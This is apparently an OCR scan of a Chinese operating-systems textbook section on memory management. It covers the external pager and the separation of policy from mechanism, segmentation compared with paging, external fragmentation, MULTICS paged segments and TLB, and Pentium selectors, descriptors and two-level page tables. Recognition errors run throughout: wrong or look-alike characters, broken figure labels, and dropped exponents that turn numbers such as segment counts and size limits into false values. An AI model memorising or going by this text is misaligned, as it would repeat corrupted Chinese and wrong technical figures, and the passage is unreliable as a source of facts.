内 存 时 ， 尽 省 丢弃 它们 ， 在 需要 的 时 候 再 从 可 执行 文件 读 入 即 可 。 共 享 
库 也 可 以 用 这 个 方式 工作 。 























3.6.6 “策略 和 机 制 的 分 离 





控制 系统 复杂 度 的 一 种 重要 方法 就 是 把 策略 从 机 制 中 分 离 出 来 。 通 
过 使 大 多 数 存 储 管 理 器 作为 用 户 级 进程 运行 ， 就 可 以 把 该 原则 应 用 到 存 
储 管理 中 。 在 Mach (Young 等 人 ，1987) 中 首先 应 用 了 这 种 分 离 。 下 面 
的 讨论 基本 上 是 基于 Mach 的 。 





一 个 如 何 分 离 策略 和 机 制 的 简单 例子 可 以 参见 图 3-30。 其 中 存储 管 
理 系统 被 分 为 三 个 部 分 : 






内 存 3. 请 求 页 面 
磁盘 
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空间 





页 面 


图 330 用 一 个 外 部 页 面 调度 程序 来 处 理 缺 页 中 断 


1) 一 个 底层 MMU 处 理 程序 。 


2) 一 个 作为 内 核 一 部 分 的 缺 页 中 断 处 理 程 序 。 





3) 一 个 运行 在 用 户 空 间 中 的 外 部 页 面 调度 程序 。 





所 有 关于 MMU 工 作 的 细节 都 被 封装 在 MMU 处 理 程 序 中 ， 该 程序 的 
代码 是 与 机 器 相关 的 ， 而 且 操作 系统 每 应 用 到 一 个 新 平台 就 要 被 重 写 一 
次 。 缺 页 中 断 处 理 程序 是 与 机 器 无 天 的 代码 ， 包 伟大 多 数 分 页 机 制 。 俩 
略 主要 由 作为 用 户 进程 运行 的 外 部 页 面 调度 程序 所 决定 。 





当 一 个 进程 启动 时 ， 需 要 通知 外 部 页 面 调度 程序 以 便 建立 进程 页 面 
上 映射， 如 果 需 要 的 话 还 要 在 磁盘 上 分 配 后备 存 储 。 当 进程 正在 运行 时 ， 

可 能 要 把 新 对 象 映 射 到 它 的 地 址 空间 ， 所 以 还 要 再 一 次 通知 外 部 页 面 
调度 程序 。 


一 且 进 程 开 始 运行 ， 就 有 可 能 出 现 缺 页 中 断 。 缺 页 中 断 处 理 程 序 找 
出 需要 哪个 虚拟 页 面 ， 并 发 送 一 条 消息 给 外 部 页 面 调 度 程 序 告诉 它 发 生 
了 什么 问题 。 外 部 页 面 调度 程序 从 磁盘 中 读 入 所 需 的 页 面 ， 把 它 复 制 到 
目 己 的 地 址 空间 的 菜 一 位 置 。 然 后 告诉 缺 页 中 断 处 理 程序 该 页 面 的 位 
置 。 缺 页 中 断 处 理 程序 从 外 部 页 面 调 度 程 序 的 地 址 空间 中 清除 该 页 面 的 
映射 ， 然 后 请 求 MMU 处 理 程序 把 它 放 到 用 户 地 址 空间 的 正确 位 置 ， 随 
后 就 可 以 重新 启动 用 户 进程 了 。 











这 个 实现 方案 没有 给 出 放置 页 面 置换 算法 的 位 置 。 把 它 放 在 外 部 页 
面 调 度 程 序 中 比较 简单 ， 但 会 有 一 些 问题 。 这 里 有 一 条 原则 就 是 外 部 页 














面 调度 程序 无 权 访 问 所 有 页 面 的 R 位 和 M 位 。 这 些 二 进 制 位 在 许多 页 面 
置换 算法 起 重要 作用 。 这 样 就 需要 有 某 种 机 制 把 该 信息 传递 给 外 部 页 面 
调度 程序 ， 或 者 把 页 面 置换 算法 放 到 内 核 中 。 在 后 一 种 情况 下 ， 缺 页 中 
断 处 理 程序 会 告诉 外 部 页 面 调度 程序 它 所 选择 的 要 淘汰 的 页 面 并 提供 数 
据 ， 方 法 是 把 数据 映射 到 外 部 页 面 调 度 程 序 的 地 址 空间 中 或 者 把 它 包 含 
到 一 条 消 奶 中 。 两 种 方法 中 ， 外 部 页 面 调度 程序 都 把 数据 写 到 磁盘 上 。 





这 种 实现 的 主要 优势 是 有 更 多 的 模块 化 代码 和 更 好 的 适应 性 。 主 要 
缺点 是 由 于 多 次 交叉 “用 户 -内 核 ” 边 界 引 起 的 额外 开销 ， 以 及 系统 模块 
间 消 息 传 递 所 造成 的 额外 开销 。 现 在 看 来 ， 这 一 主题 有 很 多 争议 ， 但 是 
随 看 计算 机 越 来 越 快 ， 软 件 越 来 越 复 杂 ， 从 长 远 来 看 ， 对 于 大 多 数 实 
现 ， 为 了 获得 更 高 的 可 靠 性 而 牺牲 一 些 性 能 也 是 可 以 接受 的 。 
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到 目前 为 止 我 们 讨论 的 虚拟 内 存 都 是 一 维 的 ， 虚 拟 地 址 从 0 到 最 大 
地 址 ， 一 个 地 址 接着 另 一 个 地 址 。 对 许多 问题 来 说 ， 有 两 个 或 多 个 独立 
的 地 址 空间 可 能 比 只 有 一 个 要 好 得 多 。 比 如 ， 一 个 编译 器 在 编译 过 程 中 
会 建立 许多 表 ， 其 中 可 能 包括 : 





1) 被 保存 起 来 供 打印 清单 用 的 源 程序 正文 《用 于 批 处 理 系统 ) 。 





2) 符 写 表 ， 包 含 变量 的 名 字 和 属性 。 





3) 包 含 用 到 的 所 有 整 型 量 和 浮 点 常量 的 表 。 
4) 语 法 分 析 树 ， 包 含 程序 语法 分 析 的 结 


5) 编 译 器 内 部 过 程 调用 使 用 的 堆栈 。 








前 4 个 表 随 着 编译 的 进行 不 断 地 增长 ， 最 后 一 个 表 在 编译 过 程 中 以 
一 种 不 可 预计 的 方式 增长 和 缩小 。 在 一 维 存储 器 中 ， 这 5 个 表 只 能 被 分 
配 到 虚拟 地 址 空间 中 连续 的 块 中 ， 如 图 3-31 所 示 。 


虚拟 地 址 空间 
WHEE 









} 空 亲 












分 配给 语法 分 析 当前 被 语法 
树 的 地 址 空间 | 语法 分 析 树 分 析 树 使 用 
| 的 空间 
a 
| 
mM ] 符号 表 已 经 ， 
符号 表 M | 碰撞 到 源 程 ， 
ee) 序 正文 表 : 


图 3-31 在 一 维 地 址 空间 中 ， 当 有 多 个 动态 增加 的 表 时 ， 一 个 表 可 能 
会 与 另 一 个 表 发 生 碰撞 





考虑 一 下 如 果 一 个 程序 有 非常 多 的 变量 ， 但 是 其 他 部 分 都 是 正常 数 
量 时 会 肥 生 什么 事情 。 地 址 空间 中 分 给 符号 表 的 块 可 能 会 被 六 满 ， 但 这 
时 其 他 表 中 还 有 大 量 的 空间 。 编 译 器 当然 可 以 简单 地 打印 出 一 条 信息 说 
由 于 变量 太 多 编译 不 能 继续 进行 ， 但 在 其 他 表 中 还 有 空间 时 这 样 做 似乎 


并 不 恰当 。 








另外 一 种 可 能 的 方法 融 是 扮演 侠盗 罗宾汉 ， 从 拥有 过 量 空间 的 表 中 
拿 出 一 些 空间 给 拥有 极 少量 空间 的 表 。 这 种 处 理 是 可 以 做 到 的 ， 但 是 它 
和 管理 自己 的 上 覆盖 一 样 ， 在 最 好 的 情况 下 是 一 件 令 人 讨厌 的 事 ， 而 最 坏 
的 情况 则 是 一 大 堆 单 调 且 没有 任何 回报 的 工作 。 











我 们 真正 需要 的 是 一 个 能 够 把 程序 员 从 管理 表 的 扩张 和 收缩 的 工作 
中 解放 出 来 的 办 法 ， 就 像 虚 拟 内 存 使 程序 员 不 用 再 为 怎样 把 程序 划分 成 
履 盖 块 担心 一 样 。 








一 个 直观 并 且 通 用 的 方法 是 在 机 器 上 提供 多 个 互相 独立 的 称 为 段 
(segment) 的 地 址 空间 。 每 个 段 由 一 个 从 0 到 最 大 的 线性 地 址 序列 构 
成 。 各 个 段 的 长 度 可 以 是 0 到 茶 个 允许 的 最 大 值 之 间 的 任何 一 个 值 。 不 
同 的 段 的 长 度 可 以 不 同 ， 并 且 通 党 情况 下 也 都 不 相同 。 段 的 长 度 在 运行 
期 间 可 以 动态 改变 ， 比 如 ， 堆 栈 段 的 长 度 在 数据 被 压 入 时 会 增长 ， 在 数 
据 被 弹出 时 又 会 减 小 。 





因为 每 个 段 都 构成 了 一 个 独立 的 地 址 空间 ， 所 以 它们 可 以 独立 地 增 
长 或 减 小 而 不 会 影响 到 其 他 的 段 。 如 果 一 个 在 茶 个 段 中 的 堆栈 需要 更 多 
的 空间 ， 它 就 可 以 立刻 得 到 所 希 要 的 空间 ， 因 为 它 的 地 址 空间 中 没有 任 
何其 他 东西 阻挡 它 增长 。 段 当然 有 可 能 会 被 效 满 ， 但 通常 情况 下 段 都 很 
大 ， 因 此 这 种 情况 发 生 的 可 能 性 很 小 。 要 在 这 种 分 段 或 二 维 的 存储 右 中 
旨 示 一 个 地 址 ， 程 序 必须 提供 两 部 分 地 址 ， 一 个 段 写 和 一 个 段 内 地 址 。 
图 3-32 给 出 了 前 面 讨论 过 的 编译 表 的 分 段 内 存 ， 其 中 共有 5 个 独立 的 
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图 3-32 分 段 存 储 管理 ， 每 一 个 段 都 可 以 独立 地 增 大 或 减 小 而 不 会 影 
响 其 他 的 段 





要 强调 的 是 ， 段 是 一 个 逻辑 实体 ， 程 友 员 知道 这 一 点 并 把 它 作 为 
一 个 逻辑 实体 来 使 用 。 一 个 段 可 能 包括 一 个 过 程 、 一 个 数组 、 一 个 堆 
栈 、 一 组 数值 变量 ， 但 一 般 它 不 会 同时 包含 多 种 不 同类 型 的 内 容 。 


除了 能 简化 对 长 度 经 常 变动 的 数据 结构 的 管理 之 外 ， 分 段 人 存储 管理 
还 有 其 他 一 些 优点 。 如 果 每 个 过 程 都 位 于 一 个 独立 的 段 中 并 且 起 始 地 址 
是 0， 那 么 把 单独 编译 好 的 过 程 链接 起 来 的 操作 就 可 以 得 到 很 大 的 简 
化 。 当 组 成 一 个 程序 的 所 有 过 程 都 被 编译 和 链接 好 以 后 ， 一 个 对 段 n 中 
过 程 的 调用 将 使 用 由 两 个 部 分 组 成 的 地 址 (n，0) 来 寻 址 到 字 0 (入 口 
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比 老 的 要 大 ， 也 不 需要 对 其 他 的 过 程 进行 修改 〈 因 为 没有 修改 它们 的 起 
始 地 址 ) 。 在 一 维 地 址 中 ， 过 程 被 一 个 换 一 个 紧 紧 地 放 在 一 起 ， 中 间 没 
有 空 际 ， 因 此 修改 一 个 过 程 的 大 小 会 影响 其 他 无 天 的 过 程 的 起 始 地 址 ， 
而 这 又 需要 修改 调用 了 这 些 被 移动 过 的 过 程 的 所 有 过 程 ， 以 使 它们 的 访 
问 指 问 这 些 过 程 的 新 地 址 。 在 一 个 有 数 百 个 过 程 的 程序 中 ， 这 个 操作 的 
开销 可 能 是 相当 大 的 。 


分 段 也 有 助 于 在 几 个 进程 之 间 共 享 过 程 和 数据 。 这 方面 一 个 常见 的 
例子 就 是 共享 库 (shared library) 。 运 行 高 级 窗口 系统 的 现代 工作 站 经 
常 要 把 非常 大 的 图 形 库 编译 进 几乎 所 有 的 程序 中 。 在 分 段 系 统 中 ， 可 以 
把 图 形 库 放 到 一 个 单独 的 段 中 由 各 个 进程 共享 ， 从 而 不 再 需要 在 每 个 进 
程 的 地 址 空间 中 都 保存 一 份 。 虽 然 在 纯 的 分 页 系统 中 也 可 以 有 共享 库 ， 
但 是 它 要 复杂 得 多 ， 并 且 这 些 系统 实际 上 是 通过 模拟 分 段 来 实现 的 。 























因为 每 个 段 是 一 个 为 程序 员 所 知道 的 逻辑 实体 ， 比 如 一 个 过 程 、 一 
个 数组 或 一 个 堆栈 ， 故 不 同 的 段 可 以 有 不 同 种 类 的 保护 。 一 个 过 程 段 可 
以 被 指明 为 只 允许 执行 ， 从 而 禁止 对 它 的 读 出 和 写 入 ; 一 个 浮 点 数组 可 
以 被 指明 为 允许 读 写 但 不 允许 执行 ， 任 何 试图 癌 这 个 段 内 的 跳 转 都 将 被 
截获 。 这 样 的 保护 有 助 于 找到 编程 错误 。 


读者 应 该 试 着 理解 为 什么 保护 在 分 段 存 储 中 有 意义 ， 而 在 一 维 的 分 
页 存储 中 则 没有 。 在 分 段 存 储 中 用 户 知道 每 个 段 中 包含 了 什么 。 例 如 ， 
一 般 来 说 ， 一 个 段 中 不 会 既 包 含 一 个 过 程 又 包含 一 个 堆栈 ， 而 是 只 会 包 
含 其 中 的 一 个 。 正 是 因为 每 个 段 只 包含 了 一 种 类 型 的 对 象 ， 所 以 这 个 段 
就 可 以 设置 针对 这 种 特定 类 型 的 合适 的 保护 。 图 3-33 对 分 段 和 分 页 进行 
了 比较 。 





需要 程序 员 了 解 正在 使 用 这 种 技 
术 吗 ? 


存在 多 少 线性 地 址 空间 ? 


整个 地 址 空间 可 以 超出 物理 存储 器 
的 大 小 吗 ? 


过 程 和 数据 可 以 被 区 分 并 分 别 被 保 
护 吗 ? 


其 大 小 浮动 的 表 可 以 很 容易 提供 吗 ? 


用 户 间 过 程 的 共享 方便 吗 ? 


为 了 得 到 大 的 为 了 使 程序 和 数据 
线性 地 址 空间 而 | 可 以 被 划分 为 逻辑 上 
不 必 购 买 更 大 的 | 独立 的 地 址 空间 并 且 
物理 存储 器 有 助 于 共享 和 保护 


为 什么 发 明 这 种 技术 ? 





图 3-33 分 页 与 分 段 的 比较 








页 面 的 内 容 在 茶 种 程度 上 是 随机 的 ， 程 友 员 甚至 察觉 不 到 分 页 的 事 
实 。 尺 管 在 页 表 的 每 个 表 项 中 放 入 几 位 就 可 以 说 明 其 对 应 页 面 的 访问 权 
限 ， 然 而 为 了 利用 这 一 点 ， 程 序 员 必 须 跟 踊 他 的 地 址 空间 中 页 面 的 界 
限 。 当 初 正 是 为 了 避免 这 一 类 管理 工作 ， 人 们 才 发 明了 分 页 系统 。 在 分 
段 系统 中 ， 由 于 用 户 会 认为 所 有 的 段 都 一 直 在 内 存 中 ， 也 惑 是 说 他 可 以 
当 作 所 有 这 些 段 都 在 内 存 中 那样 去 访问 ， 他 可 以 分 别 保护 各 个 段 ， 所 以 
不 需要 关心 覆盖 它们 的 管理 工作 。 











3.7.1 纯 分 段 的 实现 





分 段 和 分 页 的 实现 本 质 上 是 不 同 的 : 页 面 是 定 长 的 而 段 不 是 。 图 3- 
34a 所 示 的 物理 内 存在 初始 时 包含 了 5 个 段 。 现 在 让 我 们 考虑 当 段 1 被 淘 
汰 后 ， 比 它 小 的 段 7 放 进 它 的 位 置 时 会 发 生 什 么 样 的 情况 。 这 时 的 内 存 
配置 如 图 3-34b 所 示 ， 在 段 7 与 段 2 之 间 是 一 个 未 用 区 域 ， 即 一 个 空闲 
区 。 随 后 段 4 被 段 5 代 替 ， 如 图 3-34c 所 示 ; 段 3 被 段 6 代替 ， 如 图 3-34d 所 
示 。 在 系统 运行 一 段 时 间 后 内 存 被 划分 为 许多 块 ， 一 些 块 包 含 着 段 ， 一 
些 则 成 了 空闲 区 ， 这 种 现象 称 为 棋盘 形 碎片 或 外 部 碎片 Cexternal 
fragmentation) 。 空 闲 区 的 存在 使 内 存 被 浪费 了 ， 而 这 可 以 通过 内 存 紧 
缩 来 解决 。 如 图 3-34e 所 示 。 




















3.7.2 EAMG: MULTICS 











如 果 一 个 段 比 较 大 ， 把 它 整 个 保存 在 内 存 中 可 能 很 不 方便 甚至 是 不 
可 能 的 ， 因 此 产生 了 对 它 进行 分 页 的 想法 。 这 样 ， 只 有 那些 真正 需要 的 
页 面 才 会 被 调 入 内 存 。 有 几 个 著名 的 系统 实现 了 对 段 进行 分 页 的 文 持 ， 
在 本 节 我 们 将 介绍 第 一 个 实现 了 这 种 支持 的 系统 一 一 MULTICS。 在 下 
一 节 我 们 将 介绍 一 个 更 新 的 例子 





Intel Pentium. 


MULTICS 运 行 在 Honeywell 6000 计 算 机 和 它 的 一 些 后 继 机 型 上 。 它 
为 每 个 程序 提供 了 最 多 2 个 段 (超过 250 000 个 ) ， 每 个 段 的 虚拟 地 址 
空间 最 长 为 65 536 个 (36 位 〉 字 长 。 为 了 实现 它 ，MULTICS 的 设计 者 决 
定 把 每 个 段 都 看 作 是 一 个 虚拟 内 存 并 对 它 进行 分 页 ， 以 结合 分 页 的 优点 
《统一 的 页 面 大 小 和 在 只 使 用 段 的 一 部 分 时 不 用 把 它 全 部 调 入 内 存 ) 和 
分 段 的 优点 〈 易 于 编程 、 模 块 化 、 保 护 和 共享 ) 。 





每 个 MULTICS 程 序 都 有 一 个 段 表 ， 每 个 段 对 应 一 个 描述 符 。 因 为 
段 表 可 能 会 有 大 于 25 万 个 的 表 项 ， 段 表 本 和 喘 也 是 一 个 段 并 被 分 页 。 一 个 
段 描述 符 包 含 了 一 个 段 是 否 在 内 存 中 的 标志 ， 只 要 一 个 段 的 任何 一 部 分 
在 内 存 中 这 个 段 就 被 认为 是 在 内 存 中 ， 并 且 它 的 页 表 也 会 在 内 存 中 。 如 
果 一 个 段 在 内 存 中 ， 它 的 描述 符 将 包含 一 个 18 位 的 指向 它 的 页 表 的 指针 
〈 见 图 3-35a) 。 因 为 物理 地 址 是 24 位 并 且 页 面 是 按照 64 字 节 的 边界 对 


齐 的 《这 隐 含 着 页 面 地 址 的 低 6 位 是 000000) ， 所 以 在 描述 符 中 只 需要 
18 位 来 存储 页 表 地 址 。 段 描述 符 中 还 包含 了 段 大 小 、 保 护 位 以 及 其 他 的 
一 些 条 目 。 图 3-35b 一 个 MULTICS 段 描述 符 的 示例 。 段 在 辅助 存储 器 中 
的 地 址 不 在 段 描述 符 中 ， 而 是 在 缺 段 处 理 程 序 使 用 的 另 一 个 表 中 。 











页 面 0 表 项 
段 3 的 页 表 









段 6 描述 符 
段 5 描 述 符 
H 
H 













段 0 描 述 符 页 面 1 表 项 
段 1 的 页 表 


a) 


18 
tI èF ` 页 
页 表 的 主 存储 器 地 址 LE 
页 面 天 小 ; 
0 = 1024 字 sd 






乡 
多 











1= 64 字 
0= 段 是 分 页 的 ee 
1 = 段 是 不 分 页 的 


其 他 位 
保护 位 
b) 


图 3-35 MULTICS 的 虚拟 内 存 : 4) 描 述 符 段 指向 页 表 ; 一 个 段 描述 


符 ， 其 中 的 数字 是 各 个 域 的 长 度 


每 个 段 都 是 一 个 普通 的 虚拟 地 址 空间 ， 用 与 本 章 前 面 讨论 过 的 非 分 
段 式 分 页 存储 相同 的 方式 进行 分 页 。 一 般 的 页 面 大 小 是 1024 字 节 《尽管 
有 一 些 MULTICS 自 己 使 用 的 段 不 分 页 或 以 64 字 市 为 单元 进行 分 页 以 节 
省 内 存 ) 


MULTICS 中 一 个 地 址 由 两 部 分 构成 : 段 和 段 内 地 址 。 段 内 地 址 又 
进一步 分 为 页 号 和 页 内 的 字 ， 如 图 3-36 所 示 。 在 进行 内 存 访 问 时 ， 执 行 
下 面 的 算法 。 





段 内 地 址 





图 3-36 一 个 34 位 的 MULTICS 虚 拟 地 址 


1) 根 据 段 号 找到 段 描述 符 





2) 检 查 该 段 的 页 表 是 否 在 内 存 中 。 如 果 在 ， 则 找到 它 的 位 置 ， 如 果 
不 在 ， 则 产生 一 个 段 错 误 。 如 宋 访 问 违 反 了 段 的 保护 要 求 就 及 出 一 个 越 
界 错误 《陷阱 ) 。 


3) 检 查 所 请 求 虚拟 页 面 的 页 表 项 ， 如 果 该 页 面 不 在 内 存 中 则 产生 一 
个 缺 页 中 断 ， 如 果 在 内 存 就 从 页 表 项 中 取出 这 个 页 面 在 内 存 中 的 起 始 地 


址 。 


4) 把 偏 移 量 加 到 页 面 的 起 始 地 址 上 ， 得 到 要 访问 的 字 在 内 存 中 的 地 
bik. 


5) 最 后 进行 读 或 写 操作 。 


这 个 过 程 如 图 3-37 所 示 。 为 了 简单 起 见 ， 我 们 忽略 了 描述 符 段 自己 
也 要 分 页 的 事实 。 实 际 的 过 程 是 通过 一 个 寄存 器 《描述 符 基 址 寄存 器 ) 
找到 描述 符 段 的 页 表 ， 这 个 页 表 指 向 描述 符 段 的 页 面 。 一 旦 找到 了 所 需 
段 的 描述 符 ， 寻 址 过 程 就 如 图 3-37 所 示 。 


MULTICS 虚 拟 地 址 





图 3-37 两 部 分 组 成 的 MULTICS 地 址 到 内 存 地 址 的 转换 


正如 读者 所 想 ， 如 果 对 于 每 条 指令 都 由 操作 系统 来 运行 上 面 所 述 的 
算法 ， 那 么 程序 就 会 运行 得 很 慢 。 实 际 上 ，MULTICS 硬 件 包 含 了 16 个 
字 的 高 速 TLB， 对 给 定 的 关键 字 它 能 并 行 搜 索 所 有 的 表 项 ， 如 图 3-38 所 
示 。 当 一 个 地 址 被 送 到 计算 机 时 ， 寻 址 硬件 首先 检查 虚拟 地 址 是 不 是 在 
TLB 中 。 如 果 在 ， 就 直接 从 TLB 中 取得 页 框 号 并 生成 要 访问 的 字 的 实际 
地 址 ， 而 不 必 到 描述 符 段 或 页 表 中 去 查找 。 

















这 个 表 项 是 


比较 域 否 在 使 用 ? 





图 3-38 一 个 简化 的 MULTICS 的 TLB， 两 个 页 面 大 小 的 存在 使 得 实际 


的 TLB 更 复杂 


TLB 中 保存 着 16 个 最 近 访 问 的 页 的 地 址 ， 工 作 集 小 于 TLB 容 量 的 程 
序 将 随 着 整个 工作 集 的 地 址 被 装 入 TLB 中 而 逐渐 达到 稳定 ， 开 始 高 效 地 


运行 。 如 末 页 面 不 在 TLB 中 ， 才 会 访问 描述 符 和 页 表 以 找 出 页 框 号 ， 并 
更 新 TLB 使 它 包 含 这 个 页 面 ， 基 近 最 少 使 用 的 页 面 被 淘汰 出 TLB。 生 存 
时 间 位 跟踪 哪个 表 项 是 最 近 最 少 使 用 的 。 之 所 以 使 用 TLB 古 为 了 并 行 地 
比较 所 有 表 项 的 段 号 和 页 号 。 














3.7.3 ”分 段 和 分 页 结合 : Itel Pentium 


Pentium 处 理 器 的 虚拟 内 存在 许多 方面 都 与 MULTICS 类 似 ， 其 中 包 
括 既 有 分 段 机 制 又 有 分 页 机 制 。MULTICS 有 256K 个 独立 的 段 ， 每 个 段 
最 长 可 以 有 64K 个 36 位 字 。Pentium 处 理 器 有 16K 个 独立 的 段 ， 每 个 段 最 
多 可 以 容纳 10 亿 个 32 位 字 。 这 里 虽然 段 的 数目 较 少 ， 但 是 相 比 之 下 
Pentium 较 大 的 段 大 小 特征 比 更 多 的 段 个 数 要 重要 得 多 ， 因 为 几乎 没有 
程序 需要 1000 个 以 上 的 段 ， 但 是 有 很 多 程序 需要 大 段 。 














Pentium 处 理 器 中 虚拟 内 存 的 核心 是 两 张 表 ， 即 LDT (Local 
Descriptor Table， 局 部 描述 符 表 )〉 和 GDT (Global Descriptor Table， 全 
局 描述 符 表 ) 。 每 个 程序 都 有 自己 的 LDT， 但 是 同一 台 计 算 机 上 的 所 有 
程序 共享 一 个 GDT。LDT 描 述 局 部 于 每 个 程序 的 段 ， 包 括 其 代码 、 数 
据 、 堆 栈 等 ，GDT 描 述 系统 段 ， 包 括 操作 系统 本 身 。 





为 了 访问 一 个 段 ， 一 个 Pentium 程 序 必须 把 这 个 段 的 选择 子 
(selector) 装 入 机 器 的 6 个 段 寄 存 器 的 某 一 个 中 。 在 运行 过 程 中 ，CS 寄 
存 器 保存 代码 段 的 选择 子 ，DS 寄 存 器 保存 数据 段 的 选择 子 ， 其 他 的 段 
寄存 器 不 太 重 要 。 每 个 选择 子 是 一 个 16 位 数 ， 如 图 3-39 所 示 。 


DA 13 1 2 





0 = GDT/1 = LDT 特权 级 (0 一 3) 
图 3-39 Pentium 处 理 器 中 的 选择 子 


选择 子 中 的 一 位 指出 这 个 段 是 局 部 的 还 是 全 局 的 〈 即 它 是 在 LDT 中 
还 是 在 GDT 中 ) ， 其 他 的 13 位 是 LDT 或 GDT 的 表 项 编号 。 因 此 ， 这 些 表 
的 长 度 被 限制 在 最 多 容纳 8SK 个 段 描述 符 。 还 有 两 位 和 保护 有 关 ， 我 们 
将 在 后 面 讨 论 。 描 述 符 0 是 禁止 使 用 的 ， 它 可 以 被 安全 地 装 入 一 个 段 寄 
存 器 中 用 来 表示 这 个 段 寄存 器 目前 不 可 用 ， 如 果 使 用 会 引起 一 次 陷阱 。 





在 选择 子 被 装 入 段 寄存 器 时 ， 对 应 的 描述 符 被 从 LDT 或 GDT 中 取出 
装 入 微 程序 寄存 器 中 ， 以 便 快速 地 访问 。 一 个 描述 符 由 8 个 字 节 构成 ， 
包括 段 的 基地 址 、 大 小 和 其 他 信息 ， 如 图 3-40 所 示 。 


0: 段 不 在 内 存 中 
1: 段 在 内 存 中 
特权 级 (0 一 3) 
0: 系统 程序 
1: 应 用 程序 










0: 16 位 段 
1: 32 位 段 


0: Limit 以 字 节 为 单位 
1: Limit 以 页 面 为 单位 ; 
段 类 型 及 保护 
乡 


Limit 
Base 0~15 Limit 0 一 15 


= 













Dee 32 位 


图 3-40 Pentium 处理 器 代码 段 描述 符 〈 数 据 段 稍 有 不 同 ) 





选择 子 的 格式 经 过 合理 设计 ， 使 得 根据 选择 子 定位 描述 符 十 分 方 
便 。 首 先 根据 第 2 位 选择 LDT 或 GDT; 随后 选择 子 被 复制 进 一 个 内 部 擦 
除 寄存 器 中 并 且 它 的 低 3 位 被 清 0;， 最 后 ，LDT 或 GDT 表 的 地 址 被 加 到 它 
上 面 ， 得 出 一 个 直接 指向 描述 符 的 指针 。 例 如 ， 选 择 子 72 指 向 GDT 的 第 
9 个 表 项 ， 它 位 于 地 址 GDT+72。 








现在 让 我 们 跟踪 一 个 描述 地 址 的 (选择 子 ， 偏 移 量 二 元 组 被 转换 
为 物理 地 址 的 过 程 。 微 程序 知道 我 们 具体 要 使 用 哪个 段 寄 存 器 后 ， 它 就 
能 从 内 部 寄存 器 中 找到 对 应 于 这 个 选择 子 的 完整 的 描述 符 。 如 果 段 不 存 
在 (选择 子 为 0) 或 已 被 换 出 ， 则 会 发 生 一 次 陷阱 。 


人 硬件 随后 根据 Limit( 段 长 度 ) 域 检查 偏 移 量 是 否 超 出 了 上 段 的 结 
尾 ， 如 末 是 ， 也 发 生 一 次 陷阱 。 从 逻辑 上 来 说 ， 在 描述 符 中 应 该 简单 地 
有 一 个 32 位 的 域 给 出 段 的 大 小 ， 但 实际 上 剩余 20 位 可 以 使 用 ， 因 此 采用 
了 一 种 不 同 的 方案 。 如 果 Gbit Granularity〉 域 是 9， 则 是 精确 到 字 节 的 
段 长 度 ， 最 大 1MB; 如 果 是 1，Limit 域 以 页 面 蔡 代 字 节 作为 单元 给 出 段 
的 大 小 。Pentium 处 理 器 的 页 面 大 小 是 固定 的 4KB， 因 此 20 位 足以 描述 


最 大 2 字 市 的 段 。 








假设 段 在 内 存 中 并 且 偏 移 量 也 在 范围 内 ，Pentium 处 理 器 接着 把 摘 
述 符 中 32 位 的 基 址 和 偏 移 量 相 加 形成 线性 地 址 (dinear address) ， 如 图 


3-41 所 示 。 为 了 和 只 有 24 位 基 址 的 286 兼 容 ， 基 址 被 分 为 3 片 分 布 在 描述 
符 的 各 个 位 置 。 实 际 上 ， 基 址 允许 每 个 段 的 起 始 地 址 位 于 32 位 线性 地 址 
空间 内 的 任何 位 置 。 





摘 述 符 









段 长 度 





32 位 线性 地 址 





图 3-41 (CART, WE) 对 转换 为 线性 地 址 





如 采 茶 止 分 页 〈 通 过 全 局 控制 寄存 器 中 的 一 位 ) ， 线 性 地 址 就 被 解 
释 为 物理 地 址 并 被 送 往 存储 器 用 于 读 写 操作 。 因 此 在 禁止 分 页 时 ， 我 们 
就 得 到 了 一 个 纯 的 分 段 方 案 。 各 个 段 的 基 址 在 它 的 描述 符 中 。 男 外 ， 段 
之 间 允 许 互 相 窗 盖 ， 这 可 能 是 因为 验证 所 有 的 段 都 互 不 重合 太 有 麻烦 太 费 
时 间 的 缘故 。 


另 一 方面 ， 如 果 人 允许 分 页 ， 线 性 地 址 将 通过 页 表 映 射 到 物理 地 址 ， 
很 像 我 们 前 面 讲 过 的 例子 。 这 里 惟一 真正 复杂 的 是 在 32 位 虚拟 地 址 和 











4KB 页 的 情况 下 ， 一 个 段 可 能 包含 多 达 100 万 个 页 面 ， 因 此 使 用 了 一 种 
两 级 映射 ， 以 便 在 段 较 小 时 减 小 页 表 大 小 。 








每 个 运行 程序 都 有 一 个 由 1024 个 32 位 表 项 组 成 的 页 目录 Cpage 
directory) 。 饭 通过 一 个 全 局 寄存 器 来 定位 。 这 个 目录 中 的 每 个 目录 项 
都 指 同 一 个 也 包含 1024 个 32 位 表 项 的 页 表 ， 页 表 项 指 同 页 框 ， 这 个 方案 
如 图 3-42 所 示 。 





线性 地 址 


位 ; 10 10 12 





a) 
页 目录 页 表 页 框 
t J | J J, pia d | 








页 表 表 项 指 
向 字 


目录 项 指向 页 表 


b) 
图 3-42 线性 地 址 到 物理 地 址 的 映射 
在 图 3-42a 中 我 们 看 到 线性 地 址 被 分 为 三 个 域 : 日 录 、 页 面 和 偏 移 


量 。 目 录 域 被 作为 索引 在 页 目录 中 找到 指 回 正 确 的 页 表 的 指针 ， 随 后 页 
面 域 被 用 作 索 引 在 页 表 中 找到 页 框 的 物理 地 址 ， 最 后 ， 偏 移 量 被 加 到 页 














框 的 地 址 上 得 到 需要 的 字 节 或 字 的 物理 地 址 。 








每 个 页 表 项 是 32 位 ， 其 中 20 位 是 页 框 号 。 其 余 的 位 包含 了 由 硬件 设 
置 供 操作 系统 使 用 的 访问 位 和 * 脏 > 位、 保护 位 和 一 些 其 他 有 用 的 位 。 


每 个 页 表 有 描述 1024 个 4KB 页 框 的 表 项 ， 因 此 一 个 页 表 可 以 处 理 
4MB 的 内 存 。 一 个 小 于 4MB 的 段 的 页 目录 中 将 只 有 一 个 表 项 ， 这 个 表 项 
指向 一 个 惟一 的 页 表 。 通 过 这 种 方法 ， 长 度 短 的 段 的 开销 只 是 两 个 页 
面 ， 而 不 是 一 级 页 表 时 的 100 万 个 页 面 。 


为 了 避免 重复 的 内 存 访 问 ，Pentium 处 理 器 和 MULTICS 一 样 ， 也 有 
一 个 小 的 TLB 把 最 近 使 用 过 的 “目录 -页 面 ” 二 元 组 映射 为 页 框 的 物理 地 
址 。 只 有 在 当前 组 合 不 在 TLB 中 时 ， 图 3-42 所 示 的 机 制 才 被 真正 执行 并 
更 新 TLB。 只 要 TLB 的 缺失 率 很 低 ， 则 性 能 就 不 错 。 











还 有 一 点 值得 注意 ， 如 果 茶 些 应 用 程序 不 需要 分 段 ， 而 是 希 要 一 个 
